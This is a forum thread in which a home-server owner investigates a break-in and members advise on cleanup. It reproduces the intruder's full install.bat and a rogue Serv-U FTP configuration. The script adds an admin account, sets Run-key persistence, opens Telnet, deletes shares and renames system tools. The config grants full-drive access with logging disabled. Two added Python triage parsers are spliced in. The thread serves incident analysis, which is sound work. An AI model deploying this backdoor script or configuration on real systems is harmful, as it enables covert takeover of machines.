-
Hacked !!!!!!
Hey guys. KapperDog here. Some of you may remember me. I've been a member here for a few years and I read more than I post.
Need a favor, please
I am playing with a web server I set up on my home PC. It runs Win2KPro, Savant Web Server and BulletProof FTP.
The FTP was not running at the time of the hack but Savant was.
I'm not sure if I caught him in progress or if he just left a clue behind by accident but, this morning when I checked the box, it had a CMD window open and this is what was in the box.
Sure looks like I was hacked to me. LOL
Can anyone tell me what damage was done and (most importantly) whether I am still compromised?
Thanks for everything.
Hey, where's Hogfly? How's his gas? LMAO
Anyway......
Code:
C:\WINNT\system32\spool\prtprocs\w32x86>set key=1
C:\WINNT\system32\spool\prtprocs\w32x86>ver | find "2000" 1>nul
C:\WINNT\system32\spool\prtprocs\w32x86>if not errorlevel 1 set key=2
C:\WINNT\system32\spool\prtprocs\w32x86>c:
C:\WINNT\system32\spool\prtprocs\w32x86>attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\svchost.exe
C:\WINNT\system32\spool\prtprocs\w32x86>attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\servudaemon.ini
C:\WINNT\system32\spool\prtprocs\w32x86>attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\install.bat
C:\WINNT\system32\spool\prtprocs\w32x86>attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\dump0n.txt
C:\WINNT\system32\spool\prtprocs\w32x86>attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\ohq.exe
C:\WINNT\system32\spool\prtprocs\w32x86>attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\JAsfv.dll
C:\WINNT\system32\spool\prtprocs\w32x86>attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\JAsfv.ini
C:\WINNT\system32\spool\prtprocs\w32x86>attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\TzoLibr.dll
C:\WINNT\system32\spool\prtprocs\w32x86>net user GLoB peupo3nn/add /yes
The user name could not be found.
More help is available by typing NET HELPMSG 2221.
C:\WINNT\system32\spool\prtprocs\w32x86>net LOCALGROUP administrators GLoB /add
There is no such global user or group: GLoB.
More help is available by typing NET HELPMSG 3783.
C:\WINNT\system32\spool\prtprocs\w32x86>net group "Domain Admins" GLoB /add
This command can be used only on a Windows 2000 Domain Controller.
More help is available by typing NET HELPMSG 3515.
C:\WINNT\system32\spool\prtprocs\w32x86>echo REGEDIT4 1>>ins.reg
C:\WINNT\system32\spool\prtprocs\w32x86>echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 1>>ins.reg
C:\WINNT\system32\spool\prtprocs\w32x86>echo "MDM"="c:\winnt\system32\spool\prtprocs\w32x86\svchost.exe" 1>>ins.reg
C:\WINNT\system32\spool\prtprocs\w32x86>echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\] 1>>ins.reg
C:\WINNT\system32\spool\prtprocs\w32x86>echo "restrictanonymous"=dword:00000002 1>>ins.reg
C:\WINNT\system32\spool\prtprocs\w32x86>echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\] 1>>ins.reg
C:\WINNT\system32\spool\prtprocs\w32x86>echo "NTLM"=dword:00000001 1>>ins.reg
C:\WINNT\system32\spool\prtprocs\w32x86>echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TlntSvr\] 1>>ins.reg
C:\WINNT\system32\spool\prtprocs\w32x86>echo "Start"=dword:00000002 1>>ins.reg
C:\WINNT\system32\spool\prtprocs\w32x86>echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] 1>>ins.reg
C:\WINNT\system32\spool\prtprocs\w32x86>echo "AutoShareServer"=dword:00000000 1>>ins.reg
C:\WINNT\system32\spool\prtprocs\w32x86>echo "AutoShareWks"=dword:00000000 1>>ins.reg
C:\WINNT\system32\spool\prtprocs\w32x86>echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] 1>>ins.reg
C:\WINNT\system32\spool\prtprocs\w32x86>echo "DontDisplayLastUserName"=dword:00000001 1>>ins.reg
C:\WINNT\system32\spool\prtprocs\w32x86>echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters] 1>>ins.reg
C:\WINNT\system32\spool\prtprocs\w32x86>echo "RestrictNullSessAccess"=dword:00000001 1>>ins.reg
C:\WINNT\system32\spool\prtprocs\w32x86>regedit /S ins.reg
C:\WINNT\system32\spool\prtprocs\w32x86>del ins.reg
C:\WINNT\system32\spool\prtprocs\w32x86>svchost.exe /i
C:\WINNT\system32\spool\prtprocs\w32x86>net stop Serv-U
The Serv-U FTP Server service is not started.
More help is available by typing NET HELPMSG 3521.
C:\WINNT\system32\spool\prtprocs\w32x86>net start Serv-U
The Serv-U FTP Server service is starting.
The Serv-U FTP Server service was started successfully.
C:\WINNT\system32\spool\prtprocs\w32x86>net stop tlntsvr
The Telnet service is not started.
More help is available by typing NET HELPMSG 3521.
C:\WINNT\system32\spool\prtprocs\w32x86>net start tlntsvr
The Telnet service is starting.
The Telnet service was started successfully.
C:\WINNT\system32\spool\prtprocs\w32x86>net stop "messenger"
The Messenger service is not started.
More help is available by typing NET HELPMSG 3521.
C:\WINNT\system32\spool\prtprocs\w32x86>net stop "netbios"
The NetBIOS Interface service was stopped successfully.
C:\WINNT\system32\spool\prtprocs\w32x86>net share /delete C$ /y
C$ was deleted successfully.
C:\WINNT\system32\spool\prtprocs\w32x86>net share /delete D$ /y
This shared resource does not exist.
More help is available by typing NET HELPMSG 2310.
C:\WINNT\system32\spool\prtprocs\w32x86>net share /delete E$ /y
This shared resource does not exist.
More help is available by typing NET HELPMSG 2310.
C:\WINNT\system32\spool\prtprocs\w32x86>net share /delete F$ /y
This shared resource does not exist.
More help is available by typing NET HELPMSG 2310.
C:\WINNT\system32\spool\prtprocs\w32x86>net share /delete ADMIN$
Users have open files on ADMIN$. Continuing the operation will force the files closed.
Do you want to continue this operation? (Y/N) [N]:
The cursor is still flashing at this prompt waiting for a reply.
Any advice?
Thanks again, guys.
-
well......
Busy little ratbag wasn't he......<s>
Unfortunately you don't seem to have all the activity..... The command history buffer must have begun to overwrite itself..... You do have a few clues, though, that may help you clean up without a complete format and reinstall.
His password for this hack is peupo3nn
Much info and stuff he did is in C:\WINNT\system32\spool\prtprocs\w32x86
There is a batch file in the w32x86 dir called install.bat that is worth looking through.....
There is a txt file called Dump0n.txt that is also worth a close look.
servudaemon.ini might also show some interesting info as would JAsfv.ini
You have a definitive list of the registry changes he made....Undo them
close the services he started
dunno why he would stop netbios..... That's an odd one.....
He deleted your administrative shares.... you should probably leave them deleted unless you use them.
It's up to you if you simply delete the files he put in C:\WINNT\system32\spool\prtprocs\w32x86 or just keep them on a floppy to experiment with.
I'd also put a packet sniffer watching the machine for a few days
-
Well, it definitely looks like a real hack. It looks like he installed ServU ftp on my box.
This is the first time I've been hacked. Kinda fun. hehe
Although, I want to make sure my entire LAN is not in danger. It would appear he intends to return and steal, not just destroy. (Otherwise, I assume I would have formatted HDDs by now.)
Hmmmmm? Maybe I should lay in wait. LOL Unfortunately, I don't know as much as I should about this stuff.
Anyway, I hope you don't mind my multiple posts but, I'm going to post what I find as I find it. If someone wants to pick up and help out, I sure would be grateful. Thanks again.
Here is the servUDaemon.ini from the Serv-U FTP install
Code:
[GLOBAL]
Version=3.0.0.17
RegistrationKey=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAawEEBDOq4z0PJw8nAgAERHVtcAhQdWJAU3RybwdFQ0xpUFNF
ProcessID=596
MaxNrUsers=10
CheckAnonPass=1
DirCacheEnable=0
AntiHammer=1
AntiHammerTries=10
AntiHammerBlock=1800
PacketTimeOut=300
[EXTERNAL]
EventHookDLL1=JAsfv.dll
[DOMAINS]
Domain1=0.0.0.0||6969|0nlineHQ|1
[Domain1]
ReplyHello=(¯`·._.·[ 0nline.HQ ]·._.·´¯)
ReplyHelp=(¯`·._.·[ No Help avering ]·._.·´¯)
ReplyNoAnon=(¯`·._.·[ No an0nym0us acc0unt ]·._.·´¯)
ReplyNoCredit=(¯`·._.·[ No en0ught Credits ]·._.·´¯)
ReplySYST=(¯`·._.·[ Hax0r = 0nline.HQ CreW ]·._.·´¯)
ReplyTooMany=(¯`·._.·[ 421: ToO MuCh LeeCheRz / BaCk s00n ]·._.·´¯)
ReplyDown=(¯`·._.·[ Offline : BaCk s00n ]·._.·´¯)
ReplyOffline=(¯`·._.·[ Offline : BaCk s00n ]·._.·´¯)
LogSystemMes=0
LogSecurityMes=0
LogGETs=0
LogPUTs=0
MaxNrUsers=10
User1=admin|1|0
SignOn=c:\winnt\system32\spool\prtprocs\w32x86\dump0n.txt
User2=fxp|1|0
User3=leech|1|0
[USER=admin|1]
Password=vv3C067E6E3AD1C12C6D5CF9BE14CD5B19
HomeDir=c:\
AlwaysAllowLogin=1
TimeOut=1000020
Maintenance=System
Access1=c:\|RWAMELCDP
Access1=c:\|RWAMELCDP
Access2=d:\|RWAMELCDP
Access3=e:\|RWAMELCDP
Access4=f:\|RWAMELCDP
Access5=g:\|RWAMELCDP
Access6=h:\|RWAMELCDP
Access7=i:\|RWAMELCDP
Access8=j:\|RWAMELCDP
Access9=k:\|RWAMELCDP
Access10=l:\|RWAMELCDP
Access11=m:\|RWAMELCDP
Access12=n:\|RWAMELCDP
Access13=o:\|RWAMELCDP
Access14=p:\|RWAMELCDP
Access15=q:\|RWAMELCDP
Access16=r:\|RWAMELCDP
Access17=s:\|RWAMELCDP
Access18=t:\|RWAMELCDP
Access19=u:\|RWAMELCDP
Access20=v:\|RWAMELCDP
Access21=w:\|RWAMELCDP
Access22=x:\|RWAMELCDP
Access23=y:\|RWAMELCDP
Access24=z:\|RWAMELCDP
[USER=fxp|1]
Password=rjAF7C43174907EE9645895D981D10A046
HomeDir=c:\winnt\system32\spool\prtprocs\w32x86\stro
RelPaths=1
TimeOut=600
Access1=c:\winnt\system32\spool\prtprocs\w32x86\stro|RWAMLCDP
[USER=leech|1]
Password=khD56952C34B3B066BF0F400BD3D0B2B97
HomeDir=c:\winnt\system32\spool\prtprocs\w32x86\stro
RelPaths=1
TimeOut=600
Access1=c:\winnt\system32\spool\prtprocs\w32x86\stro|RLP
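The rogue ServUDaemon.ini above tells you exactly what the intruder's FTP server exposes. As an added example (not from the thread), this Python script parses an excerpt of that ini with the standard configparser module and reports the listening port, the event-hook DLL Serv-U will load, whether logging was switched off, and which accounts hold write or delete rights on a drive root; the excerpt is copied from the post with banners, password hashes and the d: to z: drive entries left out, and the meaning of the access letters is my reading of Serv-U's flags.

```python
"""Added example (not from the thread): triage of the rogue ServUDaemon.ini posted above.
Reports the listening port, the event-hook DLL Serv-U loads, whether logging was turned
off, and which accounts hold write/delete rights on a drive root."""
import configparser
import re

# Constructed excerpt of the posted ini (banners, password hashes and drives d: to z: left out).
SERVU_INI = r"""[GLOBAL]
MaxNrUsers=10
[EXTERNAL]
EventHookDLL1=JAsfv.dll
[DOMAINS]
Domain1=0.0.0.0||6969|0nlineHQ|1
[Domain1]
LogSystemMes=0
LogSecurityMes=0
User1=admin|1|0
User2=fxp|1|0
User3=leech|1|0
[USER=admin|1]
HomeDir=c:\
Access1=c:\|RWAMELCDP
[USER=fxp|1]
HomeDir=c:\winnt\system32\spool\prtprocs\w32x86\stro
Access1=c:\winnt\system32\spool\prtprocs\w32x86\stro|RWAMLCDP
[USER=leech|1]
HomeDir=c:\winnt\system32\spool\prtprocs\w32x86\stro
Access1=c:\winnt\system32\spool\prtprocs\w32x86\stro|RLP
"""

DRIVE_ROOT = re.compile(r"^[a-zA-Z]:\\?$")
# Serv-U access letters that change the tree (write, append, remove file, delete dir,
# create dir); R, L, E and P are read, list, execute and inherit-to-subdirectories.
WRITE_FLAGS = set("WAMDC")


def triage_servu(text):
    cp = configparser.RawConfigParser(strict=False)  # strict=False: posted file repeats Access1
    cp.optionxform = str                              # keep key case (HomeDir, Access1, ...)
    cp.read_string(text)
    report = {"domains": [], "hook_dlls": [], "logging_disabled": False, "accounts": {}}
    if cp.has_section("EXTERNAL"):
        report["hook_dlls"] = [v for k, v in cp.items("EXTERNAL") if k.startswith("EventHookDLL")]
    # Domain line fields as laid out in the posted file: bind address||port|name|...
    for _, dom in cp.items("DOMAINS"):
        f = dom.split("|")
        report["domains"].append({"bind": f[0], "port": int(f[2]), "name": f[3]})
    for sec in cp.sections():
        if not re.fullmatch(r"Domain\d+", sec):
            continue
        logs = [v for k, v in cp.items(sec) if k.startswith("Log")]
        report["logging_disabled"] = bool(logs) and all(v == "0" for v in logs)
        for k, v in cp.items(sec):
            if not (k.startswith("User") and k[4:].isdigit()):
                continue
            usec = "USER=" + v.rsplit("|", 1)[0]          # "admin|1|0" -> section [USER=admin|1]
            if not cp.has_section(usec):
                continue
            access = [a.split("|", 1) for ak, a in cp.items(usec) if ak.startswith("Access") and "|" in a]
            report["accounts"][v.split("|")[0]] = {
                "home": cp.get(usec, "HomeDir", fallback=""),
                "write_on_drive_root": any(DRIVE_ROOT.match(p) and bool(set(fl) & WRITE_FLAGS)
                                           for p, fl in access),
            }
    return report
```

On the posted file this flags the admin account as having full write and delete rights from c:\ downward, with server logging off, which is why the box should be treated as fully exposed rather than just hosting a stray FTP daemon.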
-
Thanks Tiger. I was looking through that directory while you were posting. Lottsa neat stuff.
Most interesting is the install.bat file.
So far, all I have done is rename all .exe's and .bat's to .bakexe and .bakbat.
I don't want to delete anything because this is a real opportunity for me to learn but, I'm afraid. LOL
I guess, the 1 thing I should focus on first is how he got in and how to stop him (and others) from returning the same way.
Any suggestions on this? Remember, I'm a newbie. LOL
I have 10 boxes on this LAN and I don't want to lose all 10 of them. LOL
Hmmm, I may be in more trouble than I thought. Well, we shall see.
Anyway, the install.bat
C:\WINNT\system32\spool\prtprocs\w32x86
Code:
set key=1
ver | find "2000" > nul
if not errorlevel 1 set key=2
c:
attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\svchost.exe
attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\servudaemon.ini
attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\install.bat
attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\dump0n.txt
attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\ohq.exe
attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\JAsfv.dll
attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\JAsfv.ini
attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\TzoLibr.dll
net user GLoB peupo3nn/add /yes
net LOCALGROUP administrators GLoB /add
net group "Domain Admins" GLoB /add
echo REGEDIT4 1>>ins.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>ins.reg
echo "MDM"="c:\winnt\system32\spool\prtprocs\w32x86\svchost.exe">>ins.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\] >> ins.reg
echo "restrictanonymous"=dword:0000000%key% >> ins.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\] >> ins.reg
echo "NTLM"=dword:00000001 >> ins.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TlntSvr\] >> ins.reg
echo "Start"=dword:00000002 >> ins.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]>> ins.reg
echo "AutoShareServer"=dword:00000000>> ins.reg
echo "AutoShareWks"=dword:00000000>> ins.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]>> ins.reg
echo "DontDisplayLastUserName"=dword:00000001>> ins.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>> ins.reg
echo "RestrictNullSessAccess"=dword:00000001>> ins.reg
regedit /S ins.reg
del ins.reg
svchost.exe /i
net stop Serv-U
net start Serv-U
net stop tlntsvr
net start tlntsvr
net stop "messenger"
net stop "netbios"
net share /delete C$ /y
net share /delete D$ /y
net share /delete E$ /y
net share /delete F$ /y
net share /delete ADMIN$
net share /delete IPC$
net stop "Remote Registry Service"
net stop "Computer Browser"
net stop "REMOTE PROCEDURE CALL"
net stop "REMOTE PROCEDURE CALL SERVICE"
net stop "Remote Access Connection Manager"
net stop "telnet"
mkdir c:\winnt\Recycled\.glob
cd c:\winnt\system32\
ren net.exe neo.exe
ren tftp.exe neo2.exe
ren ftp.exe neo3.exe
ren at.exe neo4.exe
c:\winnt\system32\spool\prtprocs\w32x86\.glob\svchost.exe /u /h
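Tiger's cleanup advice (undo the registry changes, close the services he started) can be pulled straight out of this batch file. As an added example, not from the thread, the Python script below parses an excerpt of the posted install.bat, rebuilds the .reg contents the `echo ... >> ins.reg` lines wrote (expanding %key% to the value the captured window shows), and lists the account it tried to add, the services it started and stopped, the shares it removed and the system binaries it renamed; it needs Python 3.8+ and the excerpt is copied from the post with the attrib lines and most registry lines left out.

```python
"""Added example (not from the thread): triage of the attacker's install.bat posted above.
Recovers the .reg file the script builds with `echo ... >> ins.reg` and lists the account,
service, share and rename changes it makes, as a checklist of what to review and undo."""
import re
from dataclasses import dataclass, field

# Constructed excerpt of the posted install.bat (attrib lines and most registry lines left out).
INSTALL_BAT = r"""set key=1
ver | find "2000" > nul
if not errorlevel 1 set key=2
net user GLoB peupo3nn/add /yes
echo REGEDIT4 1>>ins.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>ins.reg
echo "MDM"="c:\winnt\system32\spool\prtprocs\w32x86\svchost.exe">>ins.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\] >> ins.reg
echo "restrictanonymous"=dword:0000000%key% >> ins.reg
net start Serv-U
net start tlntsvr
net stop "Remote Registry Service"
net share /delete C$ /y
net share /delete ADMIN$
cd c:\winnt\system32\
ren net.exe neo.exe
"""

ECHO_RE = re.compile(r'^echo\s+(.*?)\s*1?>>\s*ins\.reg$', re.I)   # echo X 1>>ins.reg / >> ins.reg
VALUE_RE = re.compile(r'^"([^"]+)"=(.*)$')                        # "name"=data inside the .reg
NET_SVC_RE = re.compile(r'^net\s+(start|stop)\s+"?(.+?)"?$', re.I)
NET_SHARE_RE = re.compile(r'^net\s+share\s+/delete\s+(\S+)', re.I)
NET_USER_RE = re.compile(r'^net\s+user\s+(\S+)\s.*/add', re.I)
CD_RE = re.compile(r'^cd\s+(\S+)$', re.I)
REN_RE = re.compile(r'^ren\s+(\S+)\s+(\S+)$', re.I)

@dataclass
class Triage:
    registry: dict = field(default_factory=dict)   # key path -> {value name: data}
    users_added: list = field(default_factory=list)
    services_started: list = field(default_factory=list)
    services_stopped: list = field(default_factory=list)
    shares_deleted: list = field(default_factory=list)
    renamed: list = field(default_factory=list)    # (original path, new path)

def triage_install_bat(text, key="2"):
    """key: what %key% expanded to when the script ran; the captured window in the first
    post shows dword:00000002, so the `ver | find "2000"` test matched on this Win2K box."""
    t, cwd, section = Triage(), "", None
    for line in (l.strip() for l in text.splitlines() if l.strip()):
        if m := ECHO_RE.match(line):
            payload = m.group(1).strip().replace("%key%", key)
            if payload.startswith("[") and payload.endswith("]"):
                section = payload[1:-1].rstrip("\\")
                t.registry.setdefault(section, {})
            elif (v := VALUE_RE.match(payload)) and section is not None:
                t.registry[section][v.group(1)] = v.group(2).strip('"')
        elif m := NET_SVC_RE.match(line):
            bucket = t.services_started if m.group(1).lower() == "start" else t.services_stopped
            bucket.append(m.group(2))
        elif m := NET_SHARE_RE.match(line):
            t.shares_deleted.append(m.group(1))
        elif m := NET_USER_RE.match(line):
            t.users_added.append(m.group(1))
        elif m := CD_RE.match(line):
            cwd = m.group(1).rstrip("\\") + "\\"   # later `ren` lines are relative to this
        elif m := REN_RE.match(line):
            t.renamed.append((cwd + m.group(1), cwd + m.group(2)))
    return t
```

Treat the registry list as items to review rather than blindly revert: the Run key entry is the persistence to remove, while several of the other values are lockdown settings the intruder applied, and the captured window shows the `net user` line failed on this box ("The user name could not be found", because `/add` is glued to the password), so check local accounts directly instead of trusting the script's outcome.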
-
I've heard of the HQ CreW somewhere before..... I just can't remember where......
-
Code:
C:\WINNT\system32\spool\prtprocs\w32x86
Directory of C:\WINNT\system32\spool\prtprocs\w32x86
02/17/2003 11:23p <DIR> .
02/17/2003 11:23p <DIR> ..
02/02/2003 03:44p 1,685 dump0n.txt
02/07/2003 07:54p 2,541 install.bakbat
01/16/2002 08:07p 69,632 JAsfv.dll
02/06/2003 08:24p 2,739 JAsfv.ini
02/07/2003 02:16p 632,809 ohq.bakexe
02/17/2003 03:53p 2,091 ServUDaemon.ini
02/17/2003 03:44p 584 ServUStartUpLog.txt
12/07/1999 07:00a 6,928 sfmpsprt.dll
02/17/2003 03:54p <DIR> stro
02/04/2003 08:45p 1,930,752 svchost.bakexe
10/16/2002 09:07p 36,864 TzoLibr.dll
10 File(s) 2,686,625 bytes
3 Dir(s) 108,350,550,016 bytes free
C:\WINNT\system32\spool\prtprocs\w32x86>
dump0n.txt
Code:
¨¨°o.O0Oo+====================================+oO0O.o°¨¨
<-·´¯`·._.·´¯) Info Utilisateur (¯`·._.·´¯`·->
--={ Tu es sur le disque %Disk
--={ Ton ip %IP
--={ Utilisateurs Connectés: %UNow
--={ Nombre d'utilisateurs Acceptés: %MaxUsers
--={ Nombre d'utilisateurs connectés depuis le lancement du serveur: %UAll
--={ Utilisateurs connectés sur le serveur durant les dernieres 24H: %U24h
¨¨°o.O0Oo+====================================+oO0O.o°¨¨
<-·´¯`·._.·´¯) Descriptif Serveur (¯`·._.·´¯`·->
--={ Heure Local %Time
--={ Date Local %Date
--={ Le serveur est lancé depuis
--={ %ServerDays Jours, %ServerHours Heures, %ServerMins Mins, %ServerSecs Secs
¨¨°o.O0Oo+====================================+oO0O.o°¨¨
<-·´¯`·._.·´¯) Statistique Serveur (¯`·._.·´¯`·->
--={ Espace Disque Disponible: %DFree Ko
--={ Téléchargement Total: %ServerKbDown Ko
--={ Envoie Total: %ServerKbUp Ko
--={ Bande Passante Moyenne: %ServerAvg Ko/sec
--={ Bande Passante Actuelle: %ServerKBps Ko/sec
--={ Nombres de Fichiés Téléchargés: %FDown
--={ Nombres de Fichiés Envoyés: %FUp
¨¨°o.O0Oo+====================================+oO0O.o°¨¨
<-·´¯`·._.·´¯) Ratio Stat Serveur (¯`·._.·´¯`·->
--={ Ratio Up : %RatioUp Ko
--={ Ratio Down : %RatioDown Ko
--={ Credits restant: %RatioCredit
¨¨°o.O0Oo+====================================+oO0O.o°¨¨
-
Kapper: Ya know what's funny....... I was looking at the first printout you posted and thinking to myself "this is scripted".... LOL..... Now I see the install bat it's the exact set of commands in the same order so this was the install bat running.
You are right.... We need to find the way in.... What is the architecture of the network.... like
Internet -> Firewall -> LAN
|
v
DMZ -> Public services
I need to understand where your vulnerabilities are since clearly he had already copied all the files into place and the install bat prior to him running it and there is no evidence of how or where..... What services are available publicly? Kinda everything you can tell me?
If you don't feel comfy doing it that publicly....pm me with the info.
-
Since he started an FTP service his plan is probably to use your box as some sort of warez server.
I would go with the intrusion detection, packet capturing software.
BTW do you have timestamps for when this happened ?
Do you run a firewall ? (You should)
If you run a firewall you may want to examine the logs. This could give you some info on the whereabouts of the mischief, but he is probably proxy-chained.
Also the telnet service gets started. He might have continued his quest from telnet and forgot to terminate the command session.
Try disconnecting the other puters on your network if it is possible and monitor the traffic. This way maybe you can catch him while he is at it.
Just some general advice:
I googled for 'savant webserver' without the quotes and immediately got at least ten links to vulnerabilities in it.
Are you aware of this ?
Do you have the latest patches installed ?
Hope this will help.
-
I don't have a prob doing it publicly. This is how we all learn to deal with these little kiddies. LOL
This should be good for me (thanks to you). Hopefully, if we keep it in the forum, others will learn too.
OK, I'll describe the network as best I can.
Since we're starting at the beginning, maybe you could give me a little immediate advice.
Should I shut the server down? It's only hosting a couple ebay auctions and some other fun stuff. It's there for me to play with and learn. I would like to leave it up but if you say I should take it down, I will.
The danger is that I have my home network set up to this and, although there is nothing of interest there, there is archival data that I would not want to lose.
Does he seem to have access to my entire LAN?
OK. Thanks.. my turn
P4 2.4 /512k RAM/Win2KPro/SP2/Savant Web Server
Cable ISP/Linksys Router (pass not admin)/IP assigned to server and IP placed in DMZ
Hmmm, I'll bet you're going to slap my wrist for that one. I'll bet I should have done individual port forwarding for the web (80) and the FTP (whatever)
Well, that's what I've got. If you need more, ask.
I hope this will be an enjoyable and learning experience for us all and, I want to say thanks in advance for any participation.
Here's the install.bat
Code:
set key=1
ver | find "2000" > nul
if not errorlevel 1 set key=2
c:
attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\svchost.exe
attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\servudaemon.ini
attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\install.bat
attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\dump0n.txt
attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\ohq.exe
attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\JAsfv.dll
attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\JAsfv.ini
attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\TzoLibr.dll
net user GLoB peupo3nn/add /yes
net LOCALGROUP administrators GLoB /add
net group "Domain Admins" GLoB /add
echo REGEDIT4 1>>ins.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>ins.reg
echo "MDM"="c:\winnt\system32\spool\prtprocs\w32x86\svchost.exe">>ins.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\] >> ins.reg
echo "restrictanonymous"=dword:0000000%key% >> ins.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\] >> ins.reg
echo "NTLM"=dword:00000001 >> ins.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TlntSvr\] >> ins.reg
echo "Start"=dword:00000002 >> ins.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]>> ins.reg
echo "AutoShareServer"=dword:00000000>> ins.reg
echo "AutoShareWks"=dword:00000000>> ins.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]>> ins.reg
echo "DontDisplayLastUserName"=dword:00000001>> ins.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>> ins.reg
echo "RestrictNullSessAccess"=dword:00000001>> ins.reg
regedit /S ins.reg
del ins.reg
svchost.exe /i
net stop Serv-U
net start Serv-U
net stop tlntsvr
net start tlntsvr
net stop "messenger"
net stop "netbios"
net share /delete C$ /y
net share /delete D$ /y
net share /delete E$ /y
net share /delete F$ /y
net share /delete ADMIN$
net share /delete IPC$
net stop "Remote Registry Service"
net stop "Computer Browser"
net stop "REMOTE PROCEDURE CALL"
net stop "REMOTE PROCEDURE CALL SERVICE"
net stop "Remote Access Connection Manager"
net stop "telnet"
mkdir c:\winnt\Recycled\.glob
cd c:\winnt\system32\
ren net.exe neo.exe
ren tftp.exe neo2.exe
ren ftp.exe neo3.exe
ren at.exe neo4.exe
c:\winnt\system32\spool\prtprocs\w32x86\.glob\svchost.exe /u /h
noodle. I have his IP from the Savant log. 80.14.79.43
SamSpade didn't give up much. lol
And, I'm pretty sure that the Linksys router keeps a log by default. I just started playing as a webserver and most of this is pretty new to me.
As far as Savant, I am using version 3.1
Like I said, I just put all this up a few weeks ago and I used all current releases so, I believe I have the latest patches for everything. I'll do that same Google search and see what I find. Thanks for the tip.
-
This is just my opinion, but if you can divorce this box from the rest of your servers, I'd leave it up and treat it like a honeypot. If it's up, you may be able to catch him/her red-handed and be able to trace the attack. Again, if this is going to put your other systems at risk, you may want to take it off the wire.
Cheers:
-
I don't have much to tell you about your network's vulnerabilities (I'm just learning) but you DEFINITELY should back up all data you care about now if you haven't already got it backed up. If you haven't got it backed up already, the intruder might have already corrupted it.